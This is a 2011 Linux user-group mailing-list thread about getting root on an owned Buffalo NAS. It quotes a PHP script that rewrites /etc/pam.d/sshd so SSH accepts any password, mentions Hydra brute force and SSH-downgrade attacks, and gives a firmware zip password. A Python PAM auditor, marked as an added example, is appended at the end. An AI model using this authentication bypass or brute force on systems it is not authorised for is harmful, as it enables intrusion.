I was not saying you knew the root password, just that you knew a
password and a corresponding hash to said password and the root hash,
JTR should be able to get you the correct root password.

On 7/17/11, Mark Phillips wrote:
> Bryan,
>
> I think what you are missing is the "...and you know your password...". I
> don't know the root password for the NAS box. That is what I am trying to
> figure out so I can ssh into the box as root. What I have:
>
> * Buffalo NAS LS-WXL with firmware rev 1.43
>
> * I can ssh as root and get a password prompt.
>
> * I can ftp into the box as a user that I created, but cannot get to the
> filesystem that way.
>
> * I have downloaded the firmware and unzipped it. One thought is to add a
> key to ssh for root and login. Reflashing the unit with firmware that does
> not come from the Buffalo site is not well documented, so I have put this
> possible solution on hold for the time being.
>
> * I just found the info about using some type of php exploit, hence my
> previous email. I am not a php guy, so I am a little lost on how to make it
> work.
>
> Does this elicit any thoughts on how to crack the root password for this
> box?
>
> Thanks!
>
> Mark
>
> On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal <Bryan.ONeal@theonealandassociates.com> wrote:
>
>> If you can get a copy of the password hash file. And you know your
>> password. Then you should be able to figure out the hash function and
>> JTR should give you every password on the box. So... I seem to be
>> missing something in this conversation thread. ?
>>
>> On 7/17/11, Mark Phillips wrote:
>> > On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold wrote:
>> >
>> >> There are a lot of password files and dictionary lists on various sites.
>> >> Backtrack5 contains a good number.
>> >>
>> >> But I imagine that it's either not allowing root via ssh or you have
>> >> the wrong username.
>> >>
>> >
>> > It turns out the box is smarter than a fifth grader.....after a few hydra
>> > attacks, it started rejecting all the hydra attempts to ssh in via root.
>> > Once I stopped hydra (after running all night), it took a couple of hours
>> > before it would respond to ssh attempts from root. It now will ask for the
>> > root password, but I still have no idea what it is.
>> >
>> >>
>> >> Or it's a truly random string.
>> >>
>> >
>> > It could be....the password for the zip file to unzip the file system is
>> >
>> > YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
>> >
>> > . Someone retrieved it using a disassembler on the file system.
>> >
>> > I did some more reading, and one person was able to use php to allow ssh
>> > login. The box allows one to create a web space, and it comes with php
>> > installed. One can edit the php.ini file, and I can upload via ftp a php
>> > script. The script they suggested is:
>> >
>> > <?php
>> > $file = '../../../../etc/pam.d/sshd';
>> > $fh=fopen($file, 'w') or die("can't open file");
>> > $stringData = "account required pam_unix.so\n";
>> > fwrite($fh, $stringData);
>> > $stringData = "session required pam_unix.so\n";
>> > fwrite($fh, $stringData);
>> > $stringData = "auth required pam_permit.so\n";
>> > fwrite($fh, $stringData);
>> > fclose($fh);
>> > ?>
>> >
>> > I uploaded the script, but I get a 404 File not Found when I access the
>> > page. I thought it might be a file permission error since the file is only
>> > rw. I tried chmod 777 at the ftp prompt, and got the error message File not
>> > Found, but ls shows it is there.
>> >
>> > ftp> ls
>> > 200 PORT command successful
>> > 150 Opening ASCII mode data connection for file list
>> > drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin
>> > drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs
>> > drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log
>> > -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php
>> > 226 Transfer complete
>> > ftp> chmod 777 script.php
>> > 550 CHMOD 777 script.php: No such file or directory
>> > ftp>
>> >
>> > Is there anything I can change in the php.ini file to make this script
>> > execute? Or, am I missing something else?
>> >
>> > BTW, I cannot ftp as root, but I can ftp as a user I created,
>> > hammerhead.
>> >
>> > Thanks,
>> >
>> > Mark
>> >
>> >>
>> >> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <mark@phillipsmarketing.biz> wrote:
>> >>
>> >>> Since this is a drive buffalo, I might try ettercap ssh downgrade attack:
>> >>>>
>> >>>> http://openmaniak.com/ettercap_filter.php
>> >>>> http://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>> >>>>
>> >>>> Not sure how a man in the middle attack will work, since I don't know
>> >>>> the
>> >>> password to begin with...
>> >>>
>> >>> Or Hydra:
>> >>>>
>> >>>> Hydra Instructions:
>> >>>>
>> >>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>> >>>>
>> >>>>>
>> >>>>>> Hydra is promising. I tried it with the common passwords list from
>> >>> openwall. No luck. Do you have any better password lists?
>> >>>
>> >>> Thanks,
>> >>>
>> >>> Mark
>> >>>
>> >>> ---------------------------------------------------
>> >>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> >>> To subscribe, unsubscribe, or to change your mail settings:
>> >>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>> >>>
>> >>
>> >> --
>> >> (602) 791-8002 Android
>> >> (623) 239-3392 Skype
>> >> (623) 688-3392 Google Voice
>> >> **
>> >> HomeSmartInternational.com
>> >>
>> >
>>
>> --
>> Sent from my mobile device
>

--
Sent from my mobile device
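
Added example, not part of the original thread: the quoted PHP script replaces /etc/pam.d/sshd with an auth stack made up only of pam_permit.so, so a defender auditing a box like this can check PAM service files for auth stacks that never verify a credential. The function names and the second and third sample files are constructed for illustration, and include directives are not followed.

```python
import re

# type  control  module-path  [args]; control may be a bracketed [k=v ...] block
RULE = re.compile(r"^-?(\w+)\s+(\[[^\]]*\]|\S+)\s+(\S+)")

def auth_rules(text):
    """Return [(lineno, control, module_name)] for the auth rules of a PAM service file."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        m = RULE.match(line)                     # '@include ...' lines do not match
        if m and m.group(1).lower() == "auth":
            module = m.group(3).rsplit("/", 1)[-1]
            rules.append((lineno, m.group(2).lower(), module))
    return rules

def audit(text):
    """Flag auth stacks that can succeed without checking any credential."""
    findings = []
    rules = auth_rules(text)
    modules = {module for _, _, module in rules}
    if rules and modules <= {"pam_permit.so"}:
        findings.append("auth stack contains only pam_permit.so: any password is accepted")
    for lineno, control, module in rules:
        if module == "pam_permit.so" and control == "sufficient":
            findings.append(f"line {lineno}: 'sufficient' pam_permit.so short-circuits the auth stack")
    return findings

# The three lines the script in the thread writes to /etc/pam.d/sshd.
TAMPERED = ("account required pam_unix.so\n"
            "session required pam_unix.so\n"
            "auth required pam_permit.so\n")

# Constructed sample: pam_permit.so is only reached after pam_unix.so succeeds.
GUARDED = ("auth [success=1 default=ignore] pam_unix.so nullok\n"
           "auth requisite pam_deny.so\n"
           "auth required pam_permit.so\n"
           "account required pam_unix.so\n")

# Constructed sample: a permit rule placed ahead of the real check.
BYPASS = ("auth sufficient pam_permit.so\n"
          "auth required pam_unix.so\n")

if __name__ == "__main__":
    for name, sample in (("TAMPERED", TAMPERED), ("GUARDED", GUARDED), ("BYPASS", BYPASS)):
        print(name, audit(sample) or "ok")
```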